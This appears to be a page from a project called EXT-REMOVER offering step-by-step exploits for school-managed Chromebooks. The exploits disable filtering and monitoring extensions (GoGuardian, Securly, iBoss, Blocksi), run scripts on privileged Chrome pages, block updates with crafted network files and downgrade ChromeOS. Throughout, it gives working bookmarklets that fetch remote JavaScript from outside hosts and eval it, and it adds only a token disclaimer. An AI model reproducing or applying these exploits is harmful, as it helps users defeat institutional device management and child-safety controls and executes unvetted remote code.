Exploits
EXT-REMOVER (3kh0)
Extension Launcher (Bookmarklet)
Steps: Go to here bookmark the code there (Might make a dns) go to chrome.google.com/webstorex and use the bookmarklet, then put the icon of the extension, the id, and name of it (Doesn't matter just put anything) press download, and it will work. **Extra Notes** - Credit to "Aka, but nice" on discord. - Dns will be up soon, if bookmarklets are blocked - This will not work if you have a blocklist this is only for if when you go to the webstore it shows blockedNew Point-Blank (Run scripts on extension pages)
This exploit allows you to run scripts, on extensions pages, this is a great example of how Chromebooks are a piece of garbage. *Scroll down to preform this exploit!* Getting started (Note: if bookmarklets are blocked your screwed.) 1. Go to here (on your school chromebook of course) 2. Make a bookmark with the code there. 3. Once that is done. If you have Securly go to here if it says blocked by chrome, reload(you have to actually have securly ofc) If you have iBoss go to here, If you have Cisco Umbrella go to here If you have Blocksi go to here And if you have GoGuardian(might not work) go to here. Now most of these links are a block page(this is intentional) on each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made and click either hard disable or soft disable, you can also run some of the scripts and run your own code, your extension may disable javascript being ran on it, so running your own code may not work. **Extra notes** - I recommend doing soft disable, which only disables it until restart. - The launcher was made by me, but the idea was from Bypassi#7037 - If your school updated GoGuardian, this exploit may not work. Please use this only when you have permisson, I (3kh0/UNBLOK) do not condone the use of this exploit for illegal purposes!UBoss
By the BlueHatCrew https://dsc.gg/blue-hat-crew This works only for iBoss, and Blocksi. If you don't have one of these, use New Point Blank, that is listed above. First go to https://tinyurl.com/byeswamp if you have iBoss. https://tinyurl.com/blockboss if you have Blocksi. Then bookmark the code below ```js javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close(); ``` Then go to the site with your blocker that was listed above. And run the code. Follow the instructions there. If it doesnt work let us know by creating a discussion. This was made in partnership with Aka, but nice#5094 and Bypassi#7037. -Cubing HayCAUB (Prevent Updates)
This exploit keeps your chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your chromebook that the wifi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates. *Scroll down to preform this exploit!*  Getting started 1. Go to `chrome://network#state` (on your school chromebook of course; if this is blocked then ur kinda screwed lol). 2. Scroll to the bottom of the page; you should see a list of "favorite" wifis that you've connected to in the past. 3. Click the + sign next to the wifi name of each network that you commonly connect your chromebook to. 4. The more wifis you expand, the better, but note that they have to come from the "favorites" section. 5. Use ctrl+a and ctrl+c to copy all the text on the entire network#state page. 6. Go to [caub.glitch.me](https://caub.glitch.me/). 7. Paste the copied text into the textbox bshelow. 8. Press the "generate onc" button below the textbox. 9. Once you have downloaded the file, go to chrome://network#general 10. Click on the "import onc" button 11. Import the newly downloaded file **Extra notes** - Your chromebook will no longer automatically update. (as long as you are on a wifi that you used caub on) - Be careful not to stay on a wifi for too long without using caub on it, otherwise you might update. - We cannot guarantee that this will work on every wifi Please use this only when you have permisson, I (3kh0/UNBLOK) do not condone the use of this exploit for illegal purposes!LTBEEF (Disable extensions)
LTBEEF is an exploit, created by Bypassi#7037, which abuses api endpoints within the google chrome webstore. Please Note: This exploit only works on versions below 106, and eariler versions of 102 The original site created for this exploit can be found at ltbeef.netlify.app **Installation** There are several vesions of this exploit you can use, here are the 2 most common versions: - *Bookmarklets* To use a GUI, bookmark one of the below scripts: - Ingot ```js javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}()) ``` - Compact Cow's UI ```js javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})}); ``` - Compact Cow's UI (Dark) ```js javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval); ``` Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable. Simple! Photos of the GUI's:   - *DNS servers* By changing your DNS server, you can use LTBEEF, even if bookmarklets are blocked. First, go to Settings > Network > Wifi > Network, and click on "Custom Name Servers"  Set every box there to the following ip: ```158.101.114.159``` (Hosted by The Greatest Giant#0110) Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable. Please use this only when you have permisson, I (3kh/UNBLOK) do not condone the use of this exploit for illegal purposes!LTBEEF inspect (Using inspect to disable extensions)
 The screenshot below was preformed on 108.0.5359.75 (Official Build) (64-bit) on the stable channel. This has been tested and does work but has varying levels of success, you will need access to inspect element, more specifically, console. - Open this URL on your chromebook: `chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json` Shortened link: https://tinyurl.com/i-ltbeef - Open inspect and navigate to the console tab. - Run the basic LTBEEF code such as ```js chrome.management.setEnabled('extensionid', false) ``` Replacing `extensionid` with the ID of the extension you want to disable, e.g. the stuff after the = in the URL bar when you click the extension's "details" button in chrome://extensions Credit to SprinkzMC#8421 (aka Bypassi) for finding this!  To re-enable just go to the chrome web listing for the extension and click on the banner.Point Blank (Run code on system pages)
Point Blank is an exploit that allows you to run bookmarklets on privilaged pages, sutch as the chrome extentions page. This exploit was also found by Bypassi, you can read more about how he discovered this exploit You can either use the prompt or the gui the prompt is below 1. Bookmark this code: javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145); And the gui is in launcher.js 2. Navigate to `chrome://extensions` 3. Click on a extension that YOU installed from the Chrome Web Store > Details 4. In the URL bar, copy the string of letters and numbers after the `/?id=` 5. Click "View in Chrome Web Store" and spam the excape key. If it loads into chrome webstore try again, if it is a blank screen click the bookmarklet 5. Paste the id of the extension into the prompt or input box seperated by commas. If you close the tab, the exploit will stop working. Please use this only when you have permisson, I (3kh0/UNBLOK) do not condone the use of this exploit for illegal purposes!Downgrading (Change versions)
Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, sutch as LTBEEF. This is a built in feature of ChromeOS.  Requirements 1. A USB thumb drive with at least 4gb of storage, some board have small or bigger images, so have a beef usb, I recommend 16gb 2. A personal computer with access to downloading extentions 3. A brain Setup 1. Navigate to chrome://version on the chromebook you with to downgrade and check for your board under "Platform" (ex I have a c3100 and it's board is stable-channel octopus)
2. Navigate to https://chrome100.dev/ , press `ctrl+f` and type in your board
3. Find and download the chrome version you want to your personal computer
Instlation
1. Install Chromebook Recovery Utility onto your personal computer (found at https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en
2. Open the extention, and click on the settings button in to top right hand corner, click "use local image"
3. Select the recovery image you downloaded from chrome100
4. Plug in the USB you wish to use, and follow the prompts on the screen
5. On your chromebook, press esc+reload+power and follow the prompts
6. On the checking for updates screen, press ctrl+shift+e to skip the "checking for updates" screen
7. Profit
Please use this only when you have permisson, I (3kh0/UNBLOK) do not condone the use of this exploit for illegal purposes!